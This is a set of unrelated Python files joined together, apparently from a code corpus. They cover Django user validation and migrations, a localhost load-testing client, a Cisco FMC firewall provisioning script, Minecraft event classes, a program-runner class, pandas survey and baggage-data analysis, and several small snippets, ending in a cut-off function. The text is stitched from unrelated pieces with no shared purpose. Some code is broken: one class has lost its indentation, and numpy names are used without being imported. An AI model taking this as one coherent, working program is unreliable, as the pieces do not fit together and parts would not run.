        'password_confirm'. Returns an empty dict when everything is valid.
        """
        # build error dictionary
        errors = {}
        # check if email is already registered -- a duplicate makes the
        # remaining checks pointless, so bail out early.
        potential_user_list = User.objects.filter(email=post_data['esnales'])
        if len(potential_user_list) > 0:
            # we have a user already
            errors['esnales'] = 'A user with that email exists.'
            return errors
        # Bug fix: the field checks below were chained with elif, so an
        # invalid email silently skipped every password check. Each field is
        # now validated independently and all errors are reported at once.
        if len(post_data['name']) < 3:
            errors['name'] = 'Name is too short.'
        if len(post_data['esnales']) < 3:
            errors['esnales'] = 'Email is too short.'
        EMAIL_REGEX = re.compile(
            r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
        # test whether a field matches the pattern
        if not EMAIL_REGEX.match(post_data['esnales']):
            errors['esnales'] = "Invalid email address!"
        if len(post_data['password']) < 3:
            errors['password'] = 'Password is too short.'
        elif post_data['password'] != post_data['password_confirm']:
            # Only meaningful when the password itself passed the length check.
            errors['password_confirm'] = 'Password does not match.'
        return errors

    def login_validator(self, post_data):
        """Validate login POST data; return a dict of field errors."""
        errors = {}
        potential_user_list = User.objects.filter(email=post_data['esnales'])
        if len(potential_user_list) == 0:
            # no such user -- cannot check the password
            errors['esnales'] = 'That email does not exists.'
            return errors
        # Compare the submitted password against the stored bcrypt hash.
        does_password_match = bcrypt.checkpw(
            post_data['password'].encode(), potential_user_list[0].password.encode())
        if not does_password_match:
            errors['password'] = "That password doesn't work."
        return errors
class User(models.Model):
    """Registered user; password holds a bcrypt hash (see UserManager)."""
    name = models.CharField(max_length=255)
    email = models.CharField(max_length=255)
    password = models.CharField(max_length=255)
    created_at = models.DateTimeField(auto_now_add=True)
    updated_at = models.DateTimeField(auto_now=True)
    objects = UserManager()
|
import socket
import time
from threading import Thread
def make_request():
    """Issue one bare HTTP GET to localhost:8000 and print the elapsed time."""
    started = time.time()
    # The socket context manager closes the connection on exit.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
        conn.connect(('localhost', 8000))
        conn.send(b'GET /\n\n')
        conn.recv(100)  # response body is ignored; we only time the round trip
    print(time.strftime("%H:%M:%S"), time.time() - started)
from threading import Thread
# NOTE(review): duplicate of the import at the top of the file; harmless.
def do_request_forever():
    """Hammer the local server in an endless loop (load-generation helper)."""
    while True:
        make_request()
# Two concurrent client threads generating load.
t1 = Thread(target=do_request_forever)
t2 = Thread(target=do_request_forever)
t1.start()
t2.start()
|
#! /usr/bin/env python
"""
Program FMC and FTD using YAML file for user data.
"""
import fmcapi
import logging
from ruamel.yaml import YAML
from pathlib import Path
import argparse
def main(datafile):
    """Grab the data from the yaml file and send it to program_fmc().

    Exits with status 1 if the file cannot be opened.
    """
    yaml = YAML(typ="safe")
    path = Path(datafile)
    try:
        # Bug fix: open() used to sit OUTSIDE this try block, so the OSError
        # this handler reports (missing/unreadable file) was never caught.
        with open(path, "r") as stream:
            my_data = yaml.load(stream)
            logging.info(f"Loading {path} file.")
            program_fmc(data_vars=my_data, path=path)
    except OSError:
        logging.error(f"An error has occurred trying to open {path}.")
        exit(1)
def program_fmc(data_vars, path):
    """Use values from YAML file to program the FMC.

    Each optional top-level YAML section is handed to its dedicated
    create_* helper; absent sections are skipped with an info log.
    """
    if "fmc" in data_vars:
        # noinspection PyBroadException
        try:
            # The FMC context manager owns the API session for all helpers.
            with fmcapi.FMC(**data_vars["fmc"]) as fmc1:
                if "security_zones" in data_vars:
                    create_security_zones(fmc=fmc1, sz_list=data_vars["security_zones"])
                else:
                    logging.info(
                        "'security_zones' section not in YAML file. Skipping."
                    )
                if "hosts" in data_vars:
                    create_hosts(fmc=fmc1, na_list=data_vars["hosts"])
                else:
                    logging.info("'hosts' section not in YAML file. Skipping.")
                if "networks" in data_vars:
                    create_networks(fmc=fmc1, network_list=data_vars["networks"])
                else:
                    logging.info("'networks' section not in YAML file. Skipping.")
                if "access_policies" in data_vars:
                    create_access_policies(
                        fmc=fmc1, acp_list=data_vars["access_policies"]
                    )
                else:
                    logging.info(
                        "'access_policies' section not in YAML file. Skipping."
                    )
                if "nat_policies" in data_vars:
                    create_nat_policies(fmc=fmc1, nat_list=data_vars["nat_policies"])
                else:
                    logging.info("'nat_policies' section not in YAML file. Skipping.")
                if "device_records" in data_vars:
                    create_device_records(
                        fmc=fmc1, device_list=data_vars["device_records"]
                    )
                else:
                    logging.info(
                        "'device_records' section not in YAML file. Skipping."
                    )
        except Exception as e:
            # NOTE(review): broad catch -- any failure inside the with-block
            # (not just authentication) lands here; the message assumes a
            # connection problem.
            logging.error(
                f"Section 'fmc' does not have the right information (bad password?)"
                f" to establish a connection to FMC:"
            )
            logging.error(f"Error is '{e}'")
    else:
        logging.warning(f"No 'fmc' section found in {path}")
def create_security_zones(fmc, sz_list):
    """Create a Security Zone on the FMC for every named entry in sz_list."""
    for entry in sz_list:
        if "name" not in entry:
            continue  # unnamed entries are skipped silently, as before
        fmcapi.SecurityZones(fmc=fmc, name=entry["name"]).post()
def create_hosts(fmc, na_list):
    """Create a Host object on the FMC for each entry carrying name+value."""
    for entry in na_list:
        if "name" not in entry or "value" not in entry:
            continue  # incomplete entries are skipped silently, as before
        host = fmcapi.Hosts(fmc=fmc, name=entry["name"], value=entry["value"])
        host.post()
def create_networks(fmc, network_list):
    """Create a Network object on the FMC for each entry carrying name+value."""
    for entry in network_list:
        if "name" not in entry or "value" not in entry:
            continue  # incomplete entries are skipped silently, as before
        net = fmcapi.Networks(fmc=fmc, name=entry["name"], value=entry["value"])
        net.post()
def create_access_policies(fmc, acp_list):
    """Create Access Policies and their associated AccessRules.

    Each acp dict needs 'name' and 'default_action'; an optional 'rules'
    list describes the AccessRules to attach to that policy.
    """
    for acp in acp_list:
        policy = fmcapi.AccessPolicies(
            fmc=fmc, name=acp["name"], defaultAction=acp["default_action"]
        )
        policy.post()
        # Build access_rules associated with this acp.
        if "rules" in acp:
            for rule in acp["rules"]:
                acp_rule = fmcapi.AccessRules(
                    fmc=fmc, acp_name=policy.name, name=rule["name"]
                )
                # Each optional YAML key maps onto one AccessRules attribute.
                if "log_begin" in rule:
                    acp_rule.logBegin = rule["log_begin"]
                if "log_end" in rule:
                    acp_rule.logEnd = rule["log_end"]
                if "send_events_to_fmc" in rule:
                    acp_rule.sendEventsToFMC = rule["send_events_to_fmc"]
                if "enabled" in rule:
                    acp_rule.enabled = rule["enabled"]
                if "action" in rule:
                    acp_rule.action = rule["action"]
                # Source/destination selectors are added one named object at a time.
                if "source_networks" in rule:
                    for sn in rule["source_networks"]:
                        acp_rule.source_network(action="add", name=sn["name"])
                if "destination_networks" in rule:
                    for dn in rule["destination_networks"]:
                        acp_rule.destination_network(action="add", name=dn["name"])
                if "source_ports" in rule:
                    for sp in rule["source_ports"]:
                        acp_rule.source_port(action="add", name=sp["name"])
                if "destination_ports" in rule:
                    for dp in rule["destination_ports"]:
                        acp_rule.destination_port(action="add", name=dp["name"])
                if "intrusion_policy" in rule:
                    acp_rule.intrusion_policy(
                        action="add", name=rule["intrusion_policy"]
                    )
                """ Using SGTs isn't implemented in fmcapi yet.
                if 'source_ise_sgts' in rule:
                    for sgt in rule['source_ise_sgts']:
                        acp_rule.source_ise_sgt(action='add', name=sgt['name'])
                if 'destination_ise_sgts' in rule:
                    for sgt in rule['destination_ise_sgts']:
                        acp_rule.destination_ise_sgt(action='add', name=sgt['name'])
                """
                acp_rule.post()
def create_nat_policies(fmc, nat_list):
    """Create Nat Policies and their rules.

    Each policy dict needs 'name'; its optional 'rules' section may hold
    'auto' (AutoNatRules) and/or 'manual' (ManualNatRules) rule lists.
    """
    for natp in nat_list:
        policy = fmcapi.FTDNatPolicies(fmc=fmc, name=natp["name"])
        policy.post()
        # Build nat_rules associated with this nat policy.
        if "rules" in natp:
            if "auto" in natp["rules"]:
                for this_rule in natp["rules"]["auto"]:
                    autonat = fmcapi.AutoNatRules(fmc=fmc)
                    # Optional YAML keys map onto AutoNatRules attributes/calls.
                    if "nat_type" in this_rule:
                        autonat.natType = this_rule["nat_type"]
                    if "interface_in_translated_network" in this_rule:
                        autonat.interfaceInTranslatedNetwork = this_rule[
                            "interface_in_translated_network"
                        ]
                    if "original_network" in this_rule:
                        autonat.original_network(this_rule["original_network"])
                    if "source_interface" in this_rule:
                        autonat.source_intf(name=this_rule["source_interface"])
                    if "destination_interface" in this_rule:
                        autonat.destination_intf(
                            name=this_rule["destination_interface"]
                        )
                    # Attach the rule to its parent policy before posting.
                    autonat.nat_policy(name=natp["name"])
                    autonat.post()
            if "manual" in natp["rules"]:
                for this_rule in natp["rules"]["manual"]:
                    manualnat = fmcapi.ManualNatRules(fmc=fmc)
                    if "nat_type" in this_rule:
                        manualnat.natType = this_rule["nat_type"]
                    if "original_source" in this_rule:
                        manualnat.original_source(this_rule["original_source"])
                    if "translated_source" in this_rule:
                        manualnat.translated_source(this_rule["translated_source"])
                    if "source_interface" in this_rule:
                        manualnat.source_intf(name=this_rule["source_interface"])
                    if "destination_interface" in this_rule:
                        manualnat.destination_intf(
                            name=this_rule["destination_interface"]
                        )
                    if "enabled" in this_rule:
                        manualnat.enabled = this_rule["enabled"]
                    manualnat.nat_policy(name=natp["name"])
                    manualnat.post()
def create_device_records(fmc, device_list):
    """DeviceRecords (Registration and Interfaces).

    For each device: register it with the FMC, then configure its physical
    interfaces, static routes, and NAT policy assignment as described in
    the YAML entry.
    """
    for dr in device_list:
        # Register this device with the FMC. Assume the device is pre-programmed to listen for the FTD registration.
        ftd = fmcapi.DeviceRecords(fmc=fmc)
        if "hostname" in dr:
            ftd.hostName = dr["hostname"]
        if "registration_key" in dr:
            ftd.regKey = dr["registration_key"]
        if "access_policy" in dr:
            ftd.acp(name=dr["access_policy"])
        if "name" in dr:
            ftd.name = dr["name"]
        if "licenses" in dr:
            for lice in dr["licenses"]:
                ftd.licensing(action="add", name=lice["name"])
        # Push to FMC to start device registration.
        # NOTE(review): dr["wait_for_post"] is accessed unconditionally --
        # a YAML entry without it raises KeyError; confirm it is mandatory.
        ftd.post(post_wait_time=dr["wait_for_post"])
        # Time to configure interfaces.
        if "interfaces" in dr:
            if "physical" in dr["interfaces"]:
                for interface in dr["interfaces"]["physical"]:
                    int1 = fmcapi.PhysicalInterfaces(fmc=fmc, device_name=dr["name"])
                    if "name" in interface:
                        int1.get(name=interface["name"])
                    if "enabled" in interface:
                        int1.enabled = interface["enabled"]
                    if "interface_name" in interface:
                        int1.ifname = interface["interface_name"]
                    if "security_zone" in interface:
                        int1.sz(name=interface["security_zone"])
                    # IPv4 addressing is either static or DHCP; IPv6 is not handled yet.
                    if "addresses" in interface:
                        if "ipv4" in interface["addresses"]:
                            if "static" in interface["addresses"]["ipv4"]:
                                int1.static(
                                    ipv4addr=interface["addresses"]["ipv4"]["static"][
                                        "ip"
                                    ],
                                    ipv4mask=interface["addresses"]["ipv4"]["static"][
                                        "bitmask"
                                    ],
                                )
                            elif "dhcp" in interface["addresses"]["ipv4"]:
                                int1.dhcp(
                                    enableDefault=interface["addresses"]["ipv4"][
                                        "dhcp"
                                    ]["enable_default"],
                                    routeMetric=interface["addresses"]["ipv4"]["dhcp"][
                                        "route_metric"
                                    ],
                                )
                        if "ipv6" in interface["addresses"]:
                            pass
                    int1.put()
        # Any routing related to this device.
        if "routing" in dr:
            if "static" in dr["routing"]:
                if "ipv4" in dr["routing"]["static"]:
                    for route in dr["routing"]["static"]["ipv4"]:
                        rt = fmcapi.IPv4StaticRoutes(fmc=fmc, device_name=dr["name"])
                        if "name" in route:
                            rt.name = route["name"]
                        if "networks" in route:
                            for network in route["networks"]:
                                if "name" in network:
                                    rt.networks(
                                        action="add", networks=[network["name"]]
                                    )
                        if "gateway" in route:
                            rt.gw(name=route["gateway"])
                        if "interface_name" in route:
                            rt.interfaceName = route["interface_name"]
                        if "metric" in route:
                            rt.metricValue = route["metric"]
                        rt.post()
                if "ipv6" in dr["routing"]["static"]:
                    pass
        # Any NAT Policy assigned to this device.
        if "nat_policy" in dr:
            natp = fmcapi.PolicyAssignments(fmc=fmc)
            natp.ftd_natpolicy(
                name=dr["nat_policy"],
                devices=[{"name": dr["name"], "type": dr["type"]}],
            )
            natp.post()
if __name__ == "__main__":
    # Command-line entry point: -d/--datafile selects the YAML data file.
    parser = argparse.ArgumentParser(description="Specify arguments to modify program.")
    parser.add_argument(
        "-d",
        "--datafile",
        action="store",
        dest="datafile",
        type=str,
        help="Path and filename to YAML file containing data.",
        default="datafile.yml",
    )
    args = parser.parse_args()
    main(datafile=args.datafile)
|
# Generated by Django 2.1.5 on 2019-02-26 10:20
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
    """Drop obsolete MissingObservations fields and relax count columns.

    Auto-generated by Django; the operation list must not be edited by hand
    once this migration has been applied anywhere.
    """

    dependencies = [
        ('loader', '0001_initial'),
    ]
    operations = [
        # MissingObservations: remove the three now-unused data columns.
        migrations.RemoveField(
            model_name='missingobservations',
            name='clean_columns',
        ),
        migrations.RemoveField(
            model_name='missingobservations',
            name='clean_data',
        ),
        migrations.RemoveField(
            model_name='missingobservations',
            name='missing_data',
        ),
        # Count fields become nullable with a default of 0.
        migrations.AlterField(
            model_name='distinctids',
            name='distinct_ids',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='distinctids',
            name='total_ids',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='distinctrows',
            name='distinct_rows',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        migrations.AlterField(
            model_name='distinctrows',
            name='total_count',
            field=models.IntegerField(blank=True, default=0, null=True),
        ),
        # missing_columns switches to a JSON field.
        migrations.AlterField(
            model_name='missingobservations',
            name='missing_columns',
            field=jsonfield.fields.JSONField(blank=True, null=True),
        ),
    ]
|
from .vec3 import Vec3
class BlockEvent:
    """An Event related to blocks (e.g. placed, removed, hit)"""
    HIT = 0

    def __init__(self, type, x, y, z, face, entityId):
        self.type = type
        self.pos = Vec3(x, y, z)
        self.face = face
        self.entityId = entityId

    def __repr__(self):
        # Map the numeric type back to a readable constant name.
        kind = {BlockEvent.HIT: "BlockEvent.HIT"}.get(self.type, "???")
        return "BlockEvent(%s, %d, %d, %d, %d, %d)" % (
            kind, self.pos.x, self.pos.y, self.pos.z, self.face, self.entityId)

    @staticmethod
    def Hit(x, y, z, face, entityId):
        """Convenience constructor for a HIT event."""
        return BlockEvent(BlockEvent.HIT, x, y, z, face, entityId)
class ChatEvent:
    """An Event related to chat (e.g. posts)"""
    POST = 0

    def __init__(self, type, entityId, message):
        self.type = type
        self.entityId = entityId
        self.message = message

    def __repr__(self):
        # Map the numeric type back to a readable constant name.
        kind = {ChatEvent.POST: "ChatEvent.POST"}.get(self.type, "???")
        return "ChatEvent(%s, %d, %s)" % (kind, self.entityId, self.message)

    @staticmethod
    def Post(entityId, message):
        """Convenience constructor for a POST event."""
        return ChatEvent(ChatEvent.POST, entityId, message)
class ProjectileEvent:
    """An Event related to projectiles (e.g. placed, removed, hit)"""
    HIT = 0

    def __init__(self, type, x, y, z, face, originName, targetName):
        self.type = type
        self.pos = Vec3(x, y, z)
        self.face = face
        self.originName = originName
        self.targetName = targetName

    def __repr__(self):
        sType = {
            ProjectileEvent.HIT: "ProjectileEvent.HIT"
        }.get(self.type, "???")
        return "ProjectileEvent(%s, %d, %d, %d, %d, %s, %s)"%(
            sType,self.pos.x,self.pos.y,self.pos.z,self.face,self.originName,self.targetName)

    @staticmethod
    def Hit(x, y, z, face, originName, targetName):
        """Convenience constructor for a HIT event.

        Bug fix: this previously passed BlockEvent.HIT; both constants happen
        to be 0 today, but the type must come from this class so the two
        enums can diverge safely.
        """
        return ProjectileEvent(ProjectileEvent.HIT, x, y, z, face, originName, targetName)
|
import base64
from subprocess import Popen, PIPE
import threading
import os
from time import time
from hashlib import sha256
_author__ = 'Ritwik'
def thread_create(pr_func):
    """Decorator: calling the wrapped function returns an *unstarted* Thread.

    The thread runs pr_func(*args) and delivers the return value on the
    queue attached to the thread as `result_queue`.
    """
    import Queue

    def runner(result_queue, *args):
        # Execute the real function and hand its result back via the queue.
        result_queue.put(pr_func(*args))

    def thread_wrap(*args):
        result_queue = Queue.Queue()
        worker = threading.Thread(
            target=runner,
            args=(result_queue,) + args)
        worker.result_queue = result_queue
        return worker

    return thread_wrap
class LanguageInstance:
def __init__(self, working_directory, file_extension, comp_command, exec_command):
# Setup parameters
self.default_working_directory = working_directory
self.file_extension = file_extension
self.comp_command = comp_command
self.exec_command = exec_command
self.pr_info = {}
def program_setup(self, program_text, working_directory):
# Generate program ID and filename
self.pr_info['id'] = str(int(time())) + sha256(os.urandom(16)).hexdigest()
self.pr_info['filename'] = self.pr_info['id'] + "." + self.file_extension
# Create paths for directory and file
self.pr_info['dir'] = os.path.join(
working_directory,
self.file_extension + self.pr_info['id'])
self.pr_info['path'] = os.path.join(
self.pr_info['dir'],
self.pr_info['filename'])
os.mkdir(self.pr_info['dir'])
program_file_handler = open(self.pr_info['path'], "w+")
program_file_handler.write(program_text)
program_file_handler.close()
del program_file_handler
return self.pr_info
@thread_create
def run_command(self, pr_command, pr_input="", pr_arg="filename"):
print "In run command: " + pr_command
print pr_command + " " + self.pr_info[pr_arg]
print self.pr_info['dir']
os.chdir(self.pr_info['dir'])
print os.listdir(".")
self.pr_info['instance'] = Popen([pr_command,
self.pr_info[pr_arg]],
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
shell=True)
print "COMMAND RUN"
if pr_input is not "":
self.pr_info['instance'].stdin.write(pr_input)
self.pr_info['output'] = self.pr_info['instance'].communicate()
return self.pr_info
|
from redis import Redis
# Open DB 1; decode_responses makes lrange return str instead of bytes.
redis_connection = Redis(db=1, decode_responses=True)
list_key = "example-list"
# rpush appends to the tail; lrange(key, 0, -1) reads the whole list back.
redis_connection.rpush(list_key, 1, 2, 3, 4, 5)
print(redis_connection.lrange(list_key, 0, -1))
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 15 12:14:45 2020
@author: adeela
"""
'''
https://opensource.com/article/18/3/loop-better-deeper-look-iteration-python
https://nedbatchelder.com/blog/201608/breaking_out_of_two_loops.html
https://www.youtube.com/watch?v=u8g9scXeAcI
'''
# =============================================================================
# How can we avoid Nested loops
# =============================================================================
|
import pygame
from pygame.locals import *
import pygame.mixer
import serial
import time
#portStr = '\dev\ttyACM0'
#arduino = serial.Serial('/dev/ttyACM0', 9600)
# Small window just to receive keyboard focus/events.
pygame.display.set_mode((120, 120), DOUBLEBUF | HWSURFACE)
pygame.init()
pygame.mixer.init()
# Drum samples, loaded from the working directory.
snare = pygame.mixer.Sound('snare.wav')
crash = pygame.mixer.Sound('crash.wav')
kick = pygame.mixer.Sound('kick.wav')
# Event loop: arrow keys trigger the corresponding sample. Runs forever.
while True:
    events = pygame.event.get()
    for event in events:
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_LEFT:
                snare.play()
                #print 'a'
            elif event.key == pygame.K_RIGHT:
                crash.play()
                #print 'b'
            elif event.key == pygame.K_UP:
                kick.play()
                #print 'c'
|
# Definition for a binary tree node.
class TreeNode:
    """A binary-tree node: a value plus optional left/right children."""

    def __init__(self, x):
        self.val = x
        self.left = self.right = None
class Solution:
    """Decide whether a binary tree is a mirror image of itself."""

    def isSymmetric(self, root: TreeNode) -> bool:
        """Return True if the tree rooted at *root* is symmetric."""
        return self.isMirror(root, root)

    def isMirror(self, t1: TreeNode, t2: TreeNode):
        """Return True if t1 and t2 are mirror reflections of each other."""
        if t1 is None and t2 is None:
            return True
        if t1 is None or t2 is None:
            return False
        if t1.val != t2.val:
            return False
        # Outer children pair with outer, inner with inner.
        return self.isMirror(t1.right, t2.left) and self.isMirror(t1.left, t2.right)
# Tree Node
#                3
#              /   \
#             9     9
#            / \   / \
#           7  6  6   7
#               \    /
#               11  11
# Build the sample tree above; it is symmetric (11 sits at mirrored
# positions left.right.left and right.left.right), so this prints True.
root = TreeNode(3)
root.left = TreeNode(9)
root.left.left = TreeNode(7)
root.left.right = TreeNode(6)
root.left.right.left = TreeNode(11)
root.right = TreeNode(9)
root.right.left = TreeNode(6)
root.right.right = TreeNode(7)
root.right.left.right = TreeNode(11)
result = Solution().isSymmetric(root)
print(result)
default_config = {
    # buffer bounds for first cull of objects not on chip
    # in arcsec
    'bounds_buffer_uv': 16.0,
    # allowed values in the bitmask image
    'bitmask_allowed': 0,
    # cutout types in addition to 'image'. Allowed values are
    # ['weight','seg','bmask']
    'cutout_types': [],
    # default output data types for images
    # (numpy dtype strings: f4 = float32, i4 = int32)
    'image_dtype':'f4',
    'weight_dtype':'f4',
    'seg_dtype':'i4',
    'bmask_dtype':'i4',
}
|
# -*- coding: utf-8 -*-
import os
os.getcwd() #get the current working directory
os.chdir('D:\python_learning') #change the current working directory
import pandas as pd
from pandas import Series,DataFrame
import matplotlib.pyplot as plt
#string handling
import re
text = "foo bar\t baz \tqux"
re.split('\s+',text)
#list the rows whose string field contains certain characters
#flmData[flmData['rflfln'].str.contains('CA_CPDBAG_2016082')]
import json
db = json.load(open('D:\python_learning\pydata-book\ch07\\foods-2011-10-03.json'))
nutrients = DataFrame(db[0]['nutrients'])
from datetime import datetime
from datetime import timedelta
# NOTE(review): np is used below but never imported in this view -- presumably
# 'import numpy as np' exists elsewhere (or this cell assumed it); confirm.
df = DataFrame({'key1':['a','a','b','b','a'],
                'key2':['one','two','one','two','one'],
                'data1':np.random.randn(5),
                'data2':np.random.randn(5)})
people = DataFrame(np.random.randn(5,5),
                   columns=['a','b','c','d','e'],
                   index=['Joe','Steve','Wes','Jim','Travis'])
tips = pd.read_csv('D:\python_learning\pydata-book\ch08\\tips.csv')
fec = pd.read_csv('D:\python_learning\pydata-book\ch09\P00000001-ALL.csv')
# MovieLens dataset: users / ratings / movies joined on the id columns.
unames = ['user_id','gender','age','occupation','zip']
users = pd.read_table('D:\python_learning\pydata-book\ch02\movielens\users.dat',sep='::',header=None,names=unames)
rnames = ['user_id','movie_id','rating','timestamp']
ratings = pd.read_table(u'D:\python_learning\pydata-book\ch02\movielens\\ratings.dat',sep='::',header=None,names=rnames)
mnames=['movie_id','title','genres']
movies = pd.read_table('D:\python_learning\pydata-book\ch02\movielens\movies.dat',sep='::',header=None,names=mnames)
# Simple date arithmetic demo.
x = [1,2,3,4]
x = datetime.strptime('20161015','%Y%m%d')
y = datetime.strptime('20161021','%Y%m%d')
z = y - x
z.days
import pandas.io.data as web
import survey
# Section: pregnancy population statistics (the bare string below is a
# no-op section label kept from the original notebook-style script).
'''
怀孕人口统计
'''
#parse the fixed-width survey data into a DataFrame
y =pd.read_fwf('code\\2002FemPreg.dat',colspecs=[(0,12),(21,22),(55,56),(56,58),(58,60),(274,276),(276,277),(277,279),(283,287),(422,440)],header=None,names=['caseid','nbrnaliv','babysex','birthwgt_lb','birthwgt_oz','prglength','outcome','birthord','agepreg','finalwgt'],index_col=0,converters={'caseid':int,'nbrnaliv':int,'babysex':int})
# Percentage of records per pregnancy outcome.
y.groupby(['outcome'])['outcome'].apply(lambda x: 100.*x.count()/y.shape[0])
x =y[y.agepreg.notnull()].agepreg
bins=[500,1800,2500,3500,4000,4500]
cats = pd.cut(x,bins)
pd.value_counts(cats).map(lambda x: 100.*x/cats.size)
#split the statistics into first births vs later births
z = [0,1,10]
group_names = ['第一胎','非第一胎']
x =pd.cut(y.birthord,z,labels=group_names)
y.groupby(['prglength',x])['prglength'].count()
y.groupby(['prglength',x])['prglength'].count().unstack().plot(kind='bar')
#normalize each group's pregnancy-length distribution
z = y.groupby(x).apply(lambda x: 1. * x.groupby('prglength')['prglength'].count()/x.prglength.count())
#difference between the normalized distributions (weeks 35-45)
z = z.loc[slice(None),35:45].unstack(level=0)
z.apply(lambda x: x.ix['第一胎'][0]-x.ix['非第一胎'][0],axis=1)
#bucket births into early / on-time / late
z = [0,37,40,100]
group_names = ['早','准','晚']
y1 = y[y.birthord.notnull()]
x =pd.cut(y1.prglength,z,labels=group_names)
z = y1.groupby(x).apply(lambda x: 1. * x['prglength'].count()/y1.prglength.count())
def test():
    # For each week, P(live birth at week w | still pregnant at week w).
    # NOTE(review): relies on globals y1 and arange (numpy) -- arange is not
    # imported in this view, so this raises NameError as written; confirm.
    c = arange(30,45)
    d = []
    for x in c:
        a = y1[(y1.prglength==x) & (y1.outcome==1)]['prglength'].count()
        b = y1[(y1.prglength>=x) & (y1.outcome==1)]['prglength'].count()
        d.append(1.*a/b)
    return d
# Birth-weight distribution per birth-order group (ounces 0-20).
y.groupby(x).apply(lambda x: x.groupby('birthwgt_oz')['birthwgt_oz'].count()/x.birthwgt_oz.count()).loc[slice(None),0:20].unstack(level=0).plot()
# Section: vehicle statistics.
'''
汽车的统计
'''
v = pd.read_csv('data\\vehicles\\vehicles.csv')
l =pd.read_table('data\\vehicles\\varlabels.txt',sep=' - ',header=None)
v.groupby('year')['year'].count().plot() #records per year
(v.groupby('fuelType')['fuelType'].count()/v.fuelType.count()).sort_values().plot(kind='barh')
#supercharger column, by year
vx = v.fillna('NaN')
vx.groupby(['year','sCharger'])['sCharger'].count().unstack(level=1).plot()
# Section: probability distributions.
'''
概率分布
'''
#CDF distribution
y=pd.Series(np.random.normal(0,1000,1000))
# NOTE(review): 'd' below is a DataFrame loaded elsewhere (baggage data);
# it is not defined in this view.
y = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201604]
y1 = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201605]
y3 = d.groupby(['RCKMON','RCKFLN'])['RCKFLN'].count().unstack(0)[201606]
def cdf(group):
    """Build a DataFrame of empirical CDFs, one column per series in *group*.

    Each column is indexed by the sorted values of its series and holds the
    cumulative fraction (rank / size) at each value.
    """
    curves = pd.DataFrame()
    for series in group:
        ordered = series.sort_values()
        curve = ordered.rank(method='first') / series.size
        curve.index = ordered
        curves = pd.concat([curves, curve.dropna()], axis=1)
    return curves
z= cdf(pd.Series([y1,y]))
plt.plot(z)
#check-in file parsing
# (Goals noted below: 1. parse the file, 2. detect broken files,
#  3. validate field widths.)
"""
1.能成功解析文件
2.能发现有问题的文件
3.校验字段长度
"""
import pandas as pd
from pandas import Series,DataFrame
# Full ordered column list of the check-in record layout.
ls = Series(['rckCar','rckFln','rckFlx','rckFld','rckFlt','rckGsi','rckUpl','rckDis','rckPnr','rckMch','rckUci','rckDci','rckIvi','rckOcl','rckAdi',
             'rckChi','rckPvi','rckJsi','rckEti','rckEtn','rckFsi','rckBd1','rckCan','rckCmr','rckCma','rckCpn','rckAin','rckEmd','rckIdi','rckCsi',
             'rckFac','rckFpf','rckPjb','rckVip','rckGno','rckGnm','rckCpd','rckCwi','rckCno','rckCkn','rckIof','rckGds','rckDif','rckAfw',
             'rckBfw','rckCkc','rckIak','rckIat','rckEc1','rckE1i','rckEc2','rckE2i','rckEc3','rckE3i','rckBwi'])
# Only this subset of columns is loaded.
l = ['rckFln','rckFld','rckUpl','rckDis','rckDif','rckCwi','rckCma','rckCan']
idx = ls[ls.isin(l)].index
d = pd.read_csv(u'D:\桌面\行李\报告\国航201605数据\CA_CPDBAG_20160501.csv',usecols=idx,header=None,index_col=False,names=ls[idx])
#regular expressions
import re
text = "foo bar\t baz \tqux"
re.findall('\s+',text)
# -*- coding: utf-8 -*-
'''
HTTP base handlers.
'''
# This file is part of citadel.
# Distributed under the terms of the last AGPL License.
# The full license is in the file LICENCE, distributed as part of this software.
__author__ = 'Team Machine'
from tornado import web
class BaseHandler(web.RequestHandler):
    '''
    Shared base for the application's HTTP handlers.
    '''

    @property
    def kvalue(self):
        '''
        Key-value database handle from the application settings.
        '''
        return self.settings['kvalue']

    def initialize(self, **kwargs):
        '''
        Pull the shared resources out of the application settings.
        '''
        super(BaseHandler, self).initialize(**kwargs)
        settings = self.settings
        self.db = settings.get('db')                # system database
        self.cache = settings.get('cache')          # system cache
        self.page_size = settings.get('page_size')  # pagination size
        self.solr = settings.get('solr')            # solr riak

    def set_default_headers(self):
        '''
        Allow cross-origin requests from the configured domain ('*' fallback).
        '''
        self.set_header("Access-Control-Allow-Origin", self.settings.get('domain', '*'))
|
from django.urls import path
from ebooks.api.views import (EbookDetailAPIView, EbookListCreateAPIView,
ReviewCreateAPIView, ReviewDetailAPIView)
urlpatterns = [
    # Collection endpoint: list ebooks / create a new one.
    path("ebooks/",
         EbookListCreateAPIView.as_view(),
         name="ebook-list"),
    # Detail endpoint for a single ebook, addressed by primary key.
    path("ebooks/<int:pk>/",
         EbookDetailAPIView.as_view(),
         name="ebook-detail"),
    # Create a review attached to the ebook identified by ebook_pk.
    path("ebooks/<int:ebook_pk>/review/",
         ReviewCreateAPIView.as_view(),
         name="ebook-review"),
    # Detail endpoint for a single review.
    path("reviews/<int:pk>/",
         ReviewDetailAPIView.as_view(),
         name="review-detail")
]
from matplotlib.pyplot import *
from glob import glob
from datetime import datetime
import matplotlib.pyplot as plt
from numpy.random import randn
from os import path
import pandas as pd
import numpy as np
def file_search_glob(inpath, condition):
    """Return the paths under *inpath* matching the glob pattern *condition*.

    Bug fix: the separator was a hard-coded Windows backslash; os.path.join
    makes the helper portable across platforms.
    """
    return glob(path.join(inpath, condition))
def Get_rtrs(xlspath):
    """Compute canopy PAR statistics from one AccuPAR 'All Data' worksheet.

    Returns (doy, r, t, rs, FIPAR, FAPAR) averaged over the ESUs, where
    r/t/rs are canopy reflectance, transmittance and soil reflectance.
    NOTE(review): assumes readings come in groups of 6 rows (row 0
    above-canopy, rows 1-4 below-canopy) with 8 sensor columns -- confirm
    the instrument's export layout.
    """
    allplot = pd.read_excel(xlspath, sheet_name='All Data')
